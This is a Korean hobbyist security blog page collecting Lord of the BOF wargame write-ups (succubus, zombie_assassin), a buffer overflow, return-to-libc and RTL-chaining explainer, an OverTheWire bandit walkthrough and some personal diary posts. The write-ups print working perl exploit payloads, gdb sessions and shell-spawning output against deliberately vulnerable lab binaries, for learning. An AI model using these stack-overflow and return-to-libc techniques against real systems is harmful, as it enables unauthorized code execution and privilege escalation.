'분류 전체보기' 카테고리의 글 목록 (23 Page)

왠진 모르겠지만 이번에는 새로운 단계를 오랜만에 풀어봐서 그런지 너무 재미있었습니닼ㅋㅋㅋㅋ

막 함수주소얻는데 왜케 기분이 좋은짘ㅋㅋㅋㅋㅋ

login: zombie_assassin

Password:

Last login: Fri May 2 14:40:51 from 192.168.10.1

ls

[zombie_assassin@localhost zombie_assassin]$ ls

foo foo.c ssssssss succubus succubus.c

[zombie_assassin@localhost zombie_assassin]$ cat succubus.c

/*

The Lord of the BOF : The Fellowship of the BOF

- succubus

- calling functions continuously

*/

#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>

// the inspector

int check = 0;

void MO(char *cmd)

{

if(check != 4)

exit(0);

printf("welcome to the MO!\n");

// olleh!

system(cmd);

}

void YUT(void)

{

if(check != 3)

exit(0);

printf("welcome to the YUT!\n");

check = 4;

}

void GUL(void)

{

if(check != 2)

exit(0);

printf("welcome to the GUL!\n");

check = 3;

}

void GYE(void)

{

if(check != 1)

exit(0);

printf("welcome to the GYE!\n");

check = 2;

}

void DO(void)

{

printf("welcome to the DO!\n");

check = 1;

}

main(int argc, char *argv[])

{

char buffer[40];

char *addr;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// you cannot use library

if(strchr(argv[1], '\x40')){

printf("You cannot use library\n");

exit(0);

}

// check address

addr = (char *)&DO;

if(memcmp(argv[1]+44, &addr, 4) != 0){

printf("You must fall in love with DO\n");

exit(0);

}

// overflow!

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// stack destroyer

// 100 : extra space for copied argv[1]

memset(buffer, 0, 44);

memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100));

// LD_* eraser

// 40 : extra space for memset function

memset(buffer-3000, 0, 3000-40);

}

/*코드를 정리해주자면 버퍼+148만큼을 남겨두고 싹다 지워버립니다. 그리고 공격자는 도->개->걸->윷->모 순서로 함수를 호출해야 모가 마지막에 자신이 넘겨받은 인자를 시스템 함수로 호출해줍니다. 라이브러리의 함수는 사용할 수 없습니다. 그리고 44바이트를 채워야한다는걸 처음에 깜박했는데 44바이트+코드~~~입니다ㅋ*/

[zombie_assassin@localhost zombie_assassin]$ gdb -q ssssssss

(gdb) b main

Breakpoint 1 at 0x804880e

(gdb) r

Starting program: /home/zombie_assassin/ssssssss

Breakpoint 1, 0x804880e in main ()

(gdb) p DO

$1 = {<text variable, no debug info>} 0x80487ec <DO>

(gdb) p GYE

$2 = {<text variable, no debug info>} 0x80487bc <GYE>

(gdb) p GUL

$3 = {<text variable, no debug info>} 0x804878c <GUL>

(gdb) p YUT

$4 = {<text variable, no debug info>} 0x804875c <YUT>

(gdb) p MO

$5 = {<text variable, no debug info>} 0x8048724 <MO>

(gdb) q

The program is running. Exit anyway? (y or n) y

[zombie_assassin@localhost zombie_assassin]$ ./ssssssss `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "BBBB", "CCCC"'`

¼\$AAAABBBBCCCC

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

Segmentation fault (core dumped)

/*솔직히 여기서 정신못차림. 주소많아지니까 어우..*/

[zombie_assassin@localhost zombie_assassin]$ gdb -q -c core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

#0 0x41414141 in ?? ()

(gdb) x/40wx $esp

0xbffffaa4: 0x42424242 0x43434343 0x08048400 0x08048808

0xbffffab4: 0x00000002 0xbffffad4 0x0804839c 0x0804894c

0xbffffac4: 0x4000ae60 0xbffffacc 0x40013e90 0x00000002

0xbffffad4: 0xbffffbd0 0xbffffbdb 0x00000000 0xbffffc28

0xbffffae4: 0xbffffc42 0xbffffc50 0xbffffc68 0xbffffc87

0xbffffaf4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb04: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb14: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb24: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb34: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) x/wx 0xbffffaa8

0xbffffaa8: 0x43434343

(gdb) q

[zombie_assassin@localhost zombie_assassin]$ ./ssssssss `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\xa8\xfa\xff\xbf", "/bin/sh"'`

¼\$AAAA¨ú ¿/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ exit

exit

Segmentation fault (core dumped)

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "\x90"x44, "\xec\x87\x04\x08", "\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\xa8\xfa\xff\xbf", "/bin/sh"'`

¼\$AAAA¨ú ¿/bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ my-pass

euid = 517

못쓰는 주소들이 정말 많은 반면 100바이트를 남겨줘서 그냥 argv[1]에따가 "/bin/sh를 넣어주고 거기로 인자를 받게 했습니다. 앞의 함수들은 인자를 받지 않기(void)때문에 그냥 리턴어드레스만 받아서 쭉쭉 실행하다가 MO같은 경우는 인자를 받기 때문에 mo의 주소+4바이트의 곳에 인자의 주소를 넣고 인자는 그 뒤의 주소를 계산해서 넣어주시면 됩니다.

얼마 안남았네염 화이팅

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

nightmare->xavius (0)	2014.07.22
succubus->nightmare (0)	2014.07.10
assassin->zombie_assassin (2)	2014.06.26
assassin->zombie_assassin (0)	2014.05.13
giant->assassin (0)	2014.04.22

모양새를 좀 바꿨습니다. 그래봤자 사이즈 바꾼게 전부지만..

바탕에 당근이 안보이네여.. 후.......

당근...

아 뭐 다음에 다시그리죠 뭐.. 하하..

그리고 대문 이미지에 링크가 안됐었는데 뭐 어떻게 했는지는 모르겠지만 고쳤습니다. 이제 대문 이미지를 클릭하면 홈으로 돌아갈 수 있게 됩니다! 하지만 사이즈 조절에 fail해서 사이즈를 줄이려고 스샷으로 (~~화질따위 버려야죠..)~~ 가로 사이즈를 줄여 스샷을 찍어 다시 대문 이미지로 올렸었는데도 어째 고쳐지지가 않습니다? 암튼 대문이미지는 안고쳐지고 화질은 점점 꾸려져서 저것도 다시만들어야함..

아

안고쳐짐

다음에 다시만들죠 뭐

~~화질만꾸려짐ㅋㅋ~~

+)대문이미지 다시만들었어여 근데 사이즈 제대로 맟춰서 그려도 망함 왜저러죠 하 뭐 이상한거 건드렸나봐여

저작자표시

'KOREAN > 뻘글' 카테고리의 다른 글

20150215 오늘의 뻘글 (0)	2015.02.15
20141213 오늘의 뻘글(글이 매우 두서없음) (3)	2014.12.13
이번달에 할 것 (2)	2014.06.09
pCTF2014 irc log (2)	2014.04.13
제 프로필 사진 어떤가요 (0)	2014.03.05

솔직히 말씀드리자면 월드 다 언락되고 문제들 많은거 다 열어보지도 않았습니다.. (깊은빡침) 원도로 내가 필요한 툴들을 몇년에 걸쳐서 모아놨는데 맥이라 다시 찾아봐야한다니.. 그냥 낯설어서 찾아보자면 좋은 프로그램들은 많던데(많진 않은가) 그냥 불편하더라고요.. 많이 낯설음..

picowu.pdf

저작자표시

'CTF > picoCTF' 카테고리의 다른 글

picoCTF 2018 writeup (1)	2019.02.05
picoCTF 2014 (6)	2014.11.19

오마이갓 fake ebp.. you are like twins with fpo omg why

참고한 자료들:

http://sangu1ne.tistory.com/9 <<-여기 Sanguine형 블러그 여기 롸잇업 짱임여! 롸잇업 뿐만아니라 그냥 짱짱

http://1tchy.tistory.com/entry/fake-ebp <<-간지해커 잇치형의 블러그! 여기 역시 롸잇업 짱임!

이런분들 사이에 끼어 살다니 영광이빈다..

&&... cd80 ㅎ ㄳㄳㄳ

검색기록 날리고 고정된 탭들역시 다 날아가서.. 후.. 더 올릴 수는 없지만 크롬 제발 최근 탭 이거 좀 늘려줬으면 좋겠네요..

[assassin@localhost assassin]$ ls

zombie_assassin zombie_assassin.c

[assassin@localhost assassin]$ cat zombie_assassin.c

/*

The Lord of the BOF : The Fellowship of the BOF

- zombie_assassin

- FEBP

*/

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

char buffer[40];

if(argc < 2){

printf("argv error\n");

exit(0);

}

if(argv[1][47] == '\xbf')

{

printf("stack retbayed you!\n");

exit(0);

}

if(argv[1][47] == '\x40')

{

printf("library retbayed you, too!!\n");

exit(0);

}

// strncpy instead of strcpy!

strncpy(buffer, argv[1], 48);

printf("%s\n", buffer);

}

[assassin@localhost assassin]$ cp zombie_assassin newbie_assassin

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "\x90"x48'`

Segmentation fault (core dumped)

[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0x90909090 in ?? ()

(gdb) x/40wx $esp-40

0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffac8: 0x90909090 0x90909090 0x90909090 0x90909090 //훼이크(?)

0xbffffad8: 0x90909090 0x90909090 0x00000002 0xbffffb24

0xbffffae8: 0xbffffb30 0x40013868 0x00000002 0x08048390

0xbffffaf8: 0x00000000 0x080483b1 0x08048440 0x00000002

0xbffffb08: 0xbffffb24 0x080482e4 0x0804851c 0x4000ae60

0xbffffb18: 0xbffffb1c 0x40013e90 0x00000002 0xbffffc16

0xbffffb28: 0xbffffc28 0x00000000 0xbffffc59 0xbffffc6c

0xbffffb38: 0xbffffc84 0xbffffca3 0xbffffcc5 0xbffffcd3

0xbffffb48: 0xbffffe96 0xbffffeb5 0xbffffed3 0xbffffee8

(gdb) x/40wx $esp-80

0xbffffa90: 0x40106980 0x0804857e 0xbffffab0 0x401081ec

0xbffffaa0: 0xbffffad8 0x080484dc 0x0804857e 0xbffffab0

0xbffffab0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffac0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffae0: 0x00000002 0xbffffb24 0xbffffb30 0x40013868

0xbffffaf0: 0x00000002 0x08048390 0x00000000 0x080483b1

0xbffffb00: 0x08048440 0x00000002 0xbffffb24 0x080482e4

0xbffffb10: 0x0804851c 0x4000ae60 0xbffffb1c 0x40013e90

0xbffffb20: 0x00000002 0xbffffc16 0xbffffc28 0x00000000

(gdb) q

[assassin@localhost assassin]$ payload= buffer[dummy][system addr][dummy][binsh][leftover nop] sfp[buffer addr] ret[leaveret]

bash2: buffer[system: command not found

[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0x90909090 in ?? ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

[assassin@localhost assassin]$ clear

[assassin@localhost assassin]$ gdb -q newbie_assassin core

Core was generated by `./newbie_assassin '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048446

(gdb) r

Starting program: /home/assassin/newbie_assassin

Breakpoint 1, 0x8048446 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) disas main

Dump of assembler code for function main:

0x8048440 <main>: push %ebp

0x8048441 <main+1>: mov %esp,%ebp

0x8048443 <main+3>: sub $0x28,%esp

0x8048446 <main+6>: cmpl $0x1,0x8(%ebp)

0x804844a <main+10>: jg 0x8048463 <main+35>

0x804844c <main+12>: push $0x8048540

0x8048451 <main+17>: call 0x8048354 <printf>

0x8048456 <main+22>: add $0x4,%esp

0x8048459 <main+25>: push $0x0

0x804845b <main+27>: call 0x8048364 <exit>

0x8048460 <main+32>: add $0x4,%esp

0x8048463 <main+35>: mov 0xc(%ebp),%eax

0x8048466 <main+38>: add $0x4,%eax

0x8048469 <main+41>: mov (%eax),%edx

0x804846b <main+43>: add $0x2f,%edx

0x804846e <main+46>: cmpb $0xbf,(%edx)

0x8048471 <main+49>: jne 0x8048490 <main+80>

0x8048473 <main+51>: push $0x804854c

0x8048478 <main+56>: call 0x8048354 <printf>

0x804847d <main+61>: add $0x4,%esp

0x8048480 <main+64>: push $0x0

0x8048482 <main+66>: call 0x8048364 <exit>

0x8048487 <main+71>: add $0x4,%esp

0x804848a <main+74>: lea 0x0(%esi),%esi

0x8048490 <main+80>: mov 0xc(%ebp),%eax

0x8048493 <main+83>: add $0x4,%eax

0x8048496 <main+86>: mov (%eax),%edx

0x8048498 <main+88>: add $0x2f,%edx

0x804849b <main+91>: cmpb $0x40,(%edx)

0x804849e <main+94>: jne 0x80484b7 <main+119>

0x80484a0 <main+96>: push $0x8048561

0x80484a5 <main+101>: call 0x8048354 <printf>

0x80484aa <main+106>: add $0x4,%esp

0x80484ad <main+109>: push $0x0

0x80484af <main+111>: call 0x8048364 <exit>

0x80484b4 <main+116>: add $0x4,%esp

---Type <return> to continue, or q <return> to quit---

0x80484b7 <main+119>: push $0x30

0x80484b9 <main+121>: mov 0xc(%ebp),%eax

0x80484bc <main+124>: add $0x4,%eax

0x80484bf <main+127>: mov (%eax),%edx

0x80484c1 <main+129>: push %edx

0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax

0x80484c5 <main+133>: push %eax

0x80484c6 <main+134>: call 0x8048374 <strncpy>

0x80484cb <main+139>: add $0xc,%esp

0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax

0x80484d1 <main+145>: push %eax

0x80484d2 <main+146>: push $0x804857e

0x80484d7 <main+151>: call 0x8048354 <printf>

0x80484dc <main+156>: add $0x8,%esp

0x80484df <main+159>: leave

0x80484e0 <main+160>: ret

End of assembler dump.

[assassin@localhost assassin]$ bash2

[assassin@localhost assassin]$ ./newbie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$

bash$ exit

exit

Segmentation fault (core dumped)

[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "AAAA", "\xe0\x8a\x05\x40", "BBBB", "\xf9\xbf\x0f\x40", "\x90"x24, "\xb0\xfa\xff\xbf", "\xdf\x84\x04\x08"'`

AAAA@BBBBù¿@°ú ¿߄

bash$ my-pass

euid = 516

근데 이상한거 하나 잘못하다가 bash2 무작정 많이 돌려놨거든여 그래서 ps하면 bash2가 3개정도 돌아가고있어쓴ㄴ데 그러면 공격이 안되더라고여 (다른 세션으로 했는데 공격되는데 막 내가쓰는건 안댐)그래서 다 bash까지 exit하고서 다시 bash2하니까 되네요 왜그럼

그리고 예전에 libc에서 /bin/sh문자열 찾는 소스 구해서 여따가 썼는데.. 사이트 아마 저장해뒀을테니까 찾아볼께요 이번에 다시 완전히 처음부터 해보려고 소스던 로그던 다날려서 못찾음..ㄸㄹㄹ

그나저나 하.. 어렵다! 두단계남았다! 배고프다! 2시다!!! 으랴

+)로그 안날아갔다고 합니다 똑똑한 토끼를 칭찬해주세여 하지만 또 올릴 필요는 없으니 /bin/sh찾는 소스만 올리겠습니다

-해당 소스-

[assassin@localhost assassin]$ cat foo.c

main(){

char *p;

p = 0x4002c000;

while (1) {

while (*p++ != '/') ;

if (strcmp(p-1, "/bin/sh") == 0) {

printf("0x%08x\n", p-1);

return 0;

}

출처는 <http://www.win.tue.nl/~aeb/linux/hh/hh-10.html>여기서 찾았습니다.

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

succubus->nightmare (0)	2014.07.10
zombie_assassin->succubus (0)	2014.07.08
assassin->zombie_assassin (0)	2014.05.13
giant->assassin (0)	2014.04.22
bugbear->giant(1) (0)	2014.04.16

예전에 이 글을 매 달 올리려고 했는데 한번 올리고 끝났던것 같다

이번달은 우선 15일까지 기말고사다

내일부터 기말이다

우선 기말이 끝나면 그 다음주부터 방학특강 한시부터 여섯시까지다

그러면 하루가 아침-방학특강-저녁 이렇게 셋으로 나눠지게 되는데 아침에는 내가 아마 11시쯤에 매일 일어날테니까 2시간정도가 있고 저녁은 6시부터 12시까지니까 6시간이 있다

그렇다면 시간배분을 해야할텐데

아침에 컴퓨터공부를 하고 저녁에 학교공부, 게임을 하는 생각을 해보고 있다

물론 지켜질지가 의문이지만 =_=;; 그래도 생에 처음으로 지켜보려 한다

그냥 요즘 내가 너무 의지도 없고 해내는 것도 없어서 이대로가다간 그냥 인생망칠것같다

남과 내 실력을 비교하면서 내 진도가 느린것에 대해 자괴감도 들었었는데 그냥 천천히 내 페이스로 가는게 맞는 것 같다. 서두르려 하니까 오히려 듬성듬성하게되더라.. 그래도 진짜 스트레스 많이받는다 그냥 비교하는게 버릇이 되버린 것 같다 이러면 안되는데 그것도 좀 줄이려 노력해야겠다

아무튼, 다시 본론으로 돌아가자면,

11시 기상

11시 10분까지 밥을 먹고

12시 45분까지 컴퓨터 공부를 한다.

6시에 학원에서 돌아와서 간식을 먹고

8시(8시 반..!)까지 게임을 하고

한시간 독서하고 나머지는 각 날에 해당하는 학교공부를 할 생각이다.

학교공부는 수학 문제집을 지금 밀린걸 다풀어야되는데 9권은 된다... 다풀어야지ㅠㅠ 불어도 진짜 문법 많이공부해야된다 미친 기말 에세이를 그따구로 쓰다니 내가 미쳤지 으아ㅏ아아

월별 목표는 내가 안그래도 세우려 했는데 어디에 필요하게 됬다. 계획을 안짜는 성격이었는데 한번 짜보니 필요한 것 같다 진짜 한번 쓰니 다 지키지는 않더라도 해야할 게 보이니까 시간을 덜 낭비하는 것 같다

이게 바로 마인드가 성숙해진다는 것인가..!(뻘소리입니다 무시해주세요)

<6월> 컴퓨터공부는 이번달까지 ROP, LOB를 한문제(두문제, febp풀어놨는데 로그를 블로그에 임시저장해두니 날아가버렸다. febp안그래도 아직 확고하게 개념이 안잡혀서 걱정하고 있었는데 공부하라고 컴퓨터갓님이 날려주셨나보다)를 풀고 블로그에 정리를 하고, 그냥 요즘 컴공을 기말때문에 못해서 완전히 컴퓨터 용어는 아니지만 그래도 가끔 보이는 Proof of Concept에 대해서도 정리해보고 싶다

<7월> 다음달동안에는 LOB를 끝낼(수있었으면 좋겠다 희망사항임 진짜 근데 끝내고싶다 레알 근데 어려울거가틈)거고, 라잇업을 정리해야겠다. 더블릿도 지금 54문젠가? 풀어놨는데 역시 프로그래밍은 오랜만에 하면 그냥 너무 재밌어서, 복잡한게 풀리면 더 좋아서 지금 이상태로는 3문제? 어려운거 3문제정도 더 풀고 싶다. 그리고.. 하고싶었던게 있었는데, 기억이 안난다!(ㅋ) 어.... overthewire도 병행해서 풀어야겠다.

<8월> 그리고 대망의 8월!

..을 쓰려 했으나 방금 기억난게 하.... 여름방학동안 가족여행가네 아나 여행 일정도 모르는데 7월에 하기로 했던거 걍 7~8월에 걸쳐서 해야겠다..

해공예도 다시 읽어봐야되고 ROP좋은 문서들 있던데 그것도 다 읽어보고싶고(근데 영어울렁증 올라오려함) 특히 메모리가 아직도 왔다갔다하는데(개멍청) 종이에 그려가면서 달고나님의 문서도 다시 읽어봐야겠따. 이젠 처음 읽었을때보다 갈피는 잡았으니 필요한걸 많이 배울 수 있겠지

근데 다시 읽어보니까 진짜 쓸데없는소리 많이하는성격이다 수다떠는거 좋아하는 성격인데 다 반영된다! (혼잣말 잘함)

아 시험 걱정이다 부들ㄷ부들

저작자표시

'KOREAN > 뻘글' 카테고리의 다른 글

20141213 오늘의 뻘글(글이 매우 두서없음) (3)	2014.12.13
블로그 모양새 (0)	2014.06.29
pCTF2014 irc log (2)	2014.04.13
제 프로필 사진 어떤가요 (0)	2014.03.05
[3월목표] 잡다 (0)	2014.02.24

조금 너무 간결한 개념설명(정리)

RedHat 6.2 기준 스택 버퍼오버플로우에 대한 글 입니다.

모든 지적 다 감사히 받습니다

정말 개념만 설명하고 싶었습니다. 가장 기본적인 것들만 적어놓았으니 이런 개념이구나 참고만 하시기 바랍니다 :)

[1] Buffer Overflow (BOF)

#include<stdio.h>

main(int argc, char *argv[])

{

char buffer[40];

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

이런 코드가 있을 때 메모리의 상황은

(낮은 주소)[buffer(40 bytes)] [(Saved)Frame Pointer(4 bytes)] [Return Address(RET) (4bytes)](높은 주소)

이렇게 되게 된다. (스택이 자라는 방향: 낮은주소 ← 높은주소, 스택은 LIFO(Last-In-First-Out))

*)SFP(Saved Frame Pointer)란?- 처음에 함수 프롤로그(push %ebp)에 의해 저장된 EBP의 값이다 (함수에서 지역변수들이 사용될 때 그 기준으로 EBP가 쓰이는데 타 함수로 넘어갈 경우 다시 돌아왔을 때 ebp를 복귀시켜야 하니 저장해두는 값. 함수가 시작했을때 당시 최초의 EBP 주소를 가리키고 있다)

*)RET(Return Address)란?- EIP(Extended Instruction Pointer)가 가리킬 곳을 가르쳐주는 주소값. EIP는 프로그램이 끝난 후 돌아갈 주소를 가지고 있다.

위의 소스에서 strcpy때문에 버퍼오버플로우가 생기게 되는데, 만약에 버퍼(유저입력으로) 48바이트를 넣는다면 유저의 입력이 버퍼인 40바이트 뿐만아니라 버퍼 뒤에 있는 SFP와 RET까지 덮어버려 프로그램의 실행을 바꾸기 때문이다. RET는 EIP, 즉 함수 실행이 끝난 뒤 어디로 EIP가 가야 할 지 가르쳐주는 역할을 가지고 있기 때문에 만약에 사용자가 RET를 덮어쓴다면 사용자가 입력한 주소로 프로그램의 실행이 계속 되게 된다. 이를 이용해 버퍼에 쉘코드를 넣고 RET를 버퍼의 시작 주소값 또는 NOPSLED 중 하나의 주소값으로 설정한다면 EIP는 버퍼로 가 쉘코드를 그대로 실행하게 된다.

예시:

Payload= "\x90"x20bytes, "Shellcode"x24bytes, "Buffer Address"x4bytes

*)NOPSLED란?- NOP(No OPeration)는 (Intel x86 CPU기준으로)"\x90"을 뜻하는데, 이 명령은 아무 동작도 하지 않고 다음 명령으로 넘어가라는 뜻이다. 만약에 NOP가 900개 있고 그 후에 쉘코드가 있다면 ESP(Extended Stack Pointer- 실행하는 명령을 가르키는 포인터)는 NOPSLED(미끄럼틀같이) 아무 명령도 실행하지 않고 계속 진행하다가 마지막에 있는 쉘코드를 실행하게 된다.

*)Little Endian이란?- 엔디안은 메모리에 수를 저장하는 방식인데, 차이점은 빅 엔디안과 리틀 엔디안에 12345678을 넣게 된다면, 빅 엔디안(이 방식을 쓰는 컴퓨터는 별로 없다)은 12 34 56 78로 메모리에 적재하는 반면 리틀 엔디안은 뒤에서부터 78 56 34 12 이렇게 두바이트씩 끊어 거꾸로 넣게 된다. 고로 리턴 어스레스 같은 경우에도 페이로드에 거꾸로 뒤집어 준 후 넣어야 한다. \x~~\x~~\xff\xbf <- 이런 식

설명은 <http://itguru.tistory.com/71>을 참고했습니다

[2] Return-to-Libc (RTL)

Libc란 공유 라이브러리를 뜻한다. 이 공유 라이브러리는 프로그램이 호출될 때 사용되는 함수를 포함하고 있으며 프로그램이 언제든지 함수를 호출할 때 사용된다.

아까와 같은 코드가 있다면, (위에서 다시 가져와보자)

#include<stdio.h>

main(int argc, char *argv[])

{

char buffer[40];

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

물론 아까처럼 버퍼오버플로우를 사용하여 공격할 수도 있다. 하지만 이번에는 Libc를 사용해 공격해볼 것이다.

쉘을 따려면 system("/bin/sh");를 실행시키면 된다

프로그램을 gdb로 메인에 브레이크포인트(b main)를 건 후, 실행시킨 후 브레이크포인트에서 p system을 하면 system함수의 주소가 나온다.

RET를 이 시스템 함수의 주소로 하고, 그 후 4바이트 뒤에 &"/bin/sh" (/bin/sh의 주소) 를 넣으면 system이 ebp+8부터 인자를 참조하기 때문에 system("/bin/sh"); 를 실행하게 된다.

ebp+4에는(system함수 주소 뒤, /bin/sh주소 앞) 더미를 넣거나, 깔끔하게 끝내고 싶다면 exit의 주소를 넣으면 된다. 이곳은 system실행 후 돌아갈 ret을 저장하는 곳이기 때문이다.

예시:

Payload= "\x90"x44bytes, "system address"x4bytes, "exit address"x4bytes, "/bin/sh address"x4bytes

[3] RTL Chaining (Chaining RTL Calls)

RTL Chaining, 이건 위의 RTL과 비슷한 개념이다.

만약에 위와 같은 코드에 strcpy를 두번, system을 한번 이렇게 연속으로 실행하고 싶다고 가정해보자.(걍 머리에 떠오르는 함수,...)

그렇다면 이것들을 어떻게 실행시켜야 할까?

strcpy의 인자는 2개(char *dest, const char *source)이다. 인자가 하나라면 (function) (function) (argv) (argv) 이렇게 끼워서 두 번 실행시킬 수 있겠지만, 늘 함수 주소 뒤의 4바이트를 인자로 참조하기 때문에 인자가 2개인 strcpy는 1번 이상 사용할 수 없다.

&strcpy &strcpy(x) &dest &source <...어떻게 전달하지?>

RTL Chaining을 사용하면 된다!!(??뜬금 느낌표)

우선 개념도를 적어놓겠다.

&strcpy &poppopret &dest &source &strcpy &poppopret &dest &source &system &exit &/bin/sh

pop- Stack에서 데이터를 빼는 것 말고도 pop는 esp+4를 하게 되기 때문에 다음 인스트럭션을 가르키게 된다. 이 경우에는 가젯이 pop pop ret이기 때문에 strcpy를 실행하고 인자를 두 개 전달한 뒤, pop pop ret을 이용해 두 인자를 건너뛰고 그 뒤에 있는 두 번째 strcpy의 주소를 ret하여 다시 실행하게 되는 것이다.

*)가젯(Gadget)이란?- 프로그램 내부의(함수에) 기계어로 된 ret로 끝나는 코드의 조각으로써 필요한 가젯을 찾아 공격자의 마음대로 사용하면 된다

만약에 건너뛰어야 하는 인자가 3개라면, pop pop pop ret, 하나라면 pop ret을 찾아 사용하면 되는 것이다.

[4] SFP overwrite (One-byte Overflow)

http://evertokki.tistory.com/78

[5] Fake EBP (FEBP)

<기말공부다하고돌아오겟슴니다>

저작자표시

'STUDY > Documentation' 카테고리의 다른 글

핸드레이 (0)	2015.09.05
strace, 제가 한번 사용해 보겠습니다. (0)	2014.07.22
Key File (0)	2014.05.16
Frame Pointer Overwrite/One Byte Overflow (5)	2014.04.06
[CodeGate Junior Quals] RunCommand 250 (0)	2014.04.06

bandit 0

[SSH] Logged in (password)

bandit0@melinda:~$ ls

readme

bandit0@melinda:~$ cat readme

bandit1

[SSH] Logged in (password)

bandit1@melinda:~$ ls

-

bandit1@melinda:~$ cat ./-

bandit2

[SSH] Logged in (password)

bandit2@melinda:~$ ls

spaces in this filename

bandit2@melinda:~$ cat "spaces in this filename"

bandit3

[SSH] Logged in (password)

bandit3@melinda:~$ ls

inhere

bandit3@melinda:~$ cd inhere

bandit3@melinda:~/inhere$ ls

bandit3@melinda:~/inhere$ ls -al

total 12

drwxr-xr-x 2 root root 4096 Jun 6 2013 .

drwxr-xr-x 3 root root 4096 Jun 6 2013 ..

-rw-r----- 1 bandit4 bandit3 33 Jun 6 2013 .hidden

bandit3@melinda:~/inhere$ cat .hidden

bandit4

[SSH] Logged in (password)

bandit4@melinda:~$ ls

inhere

bandit4@melinda:~$ cd inhere

bandit4@melinda:~/inhere$ ls

-file00 -file01 -file02 -file03 -file04 -file05 -file06 -file07 -file08 -file09

bandit4@melinda:~/inhere$ cat ./-file04

[¢±B°

§&6]U³w޽RZ!Nohbandit4@melinda:~/inhere$ cat ./-file05

¯<ÛDjüN#C|0|§ Tµ®G±@àábandit4@melinda:~/inhere$ cat ./-file08

ññdCgb.<ê"Q 2Bö÷{é3Sbandit4@melinda:~/inhere$ cat ./-file09

~і õõ|±M^߮-%ƌ

³¿²"^±kUbandit4@melinda:~/inhere$ cat ./-file07

bandit5

[SSH] Logged in (password)

bandit5@melinda:~$ ls

inhere

bandit5@melinda:~$ cd inhere

bandit5@melinda:~/inhere$ find -size 1033c

./maybehere07/.file2

bandit5@melinda:~/inhere$ cat ./maybehere07/.file2

bandit6

[SSH] Logged in (password)

bandit6@melinda:~$ ls

bandit6@melinda:~$ ls -al

total 20

drwxr-xr-x 2 root root 4096 Jun 6 2013 .

drwxr-xr-x 160 root root 4096 Oct 17 2013 ..

-rw-r--r-- 1 root root 220 Apr 3 2012 .bash_logout

-rw-r--r-- 1 root root 3486 Apr 3 2012 .bashrc

-rw-r--r-- 1 root root 675 Apr 3 2012 .profile

bandit6@melinda:/home$ find -size 33c

./bandit21/.prevpass

./bandit15/.bandit14.password

find: `./bandit5/inhere': Permission denied

[...]

find: `/root': Permission denied

bandit6@melinda:/home$ find / -size 33c -user bandit7 -group bandit6 2>&1 | grep -v 'Permission denied'

/var/lib/dpkg/info/bandit7.password

bandit6@melinda:/home$ cat /var/lib/dpkg/info/bandit7.password

+)Searched for: (Google) how to use find size group user options, how to ignore permission denied in linux find

bandit7

[SSH] Logged in (password)

bandit7@melinda:~$ ls

data.txt

bandit7@melinda:~$ grep "millionth" data.txt

millionth <password>

+)Searched for: how to grep for a string in file

bandit8

[SSH] Logged in (password)

bandit8@melinda:~$ ls

data.txt

bandit8@melinda:~$ sort data.txt | uniq -u

+)Searched for: how to exclude duplicate string in file

bandit9

[SSH] Logged in (password)

bandit9@melinda:~$ ls

data.txt

bandit9@melinda:~$ cat data.txt

O.o...No this is not the way I wanna...*cough cough*

bandit10

[SSH] Logged in (password)

bandit10@melinda:~$ ls

data.txt

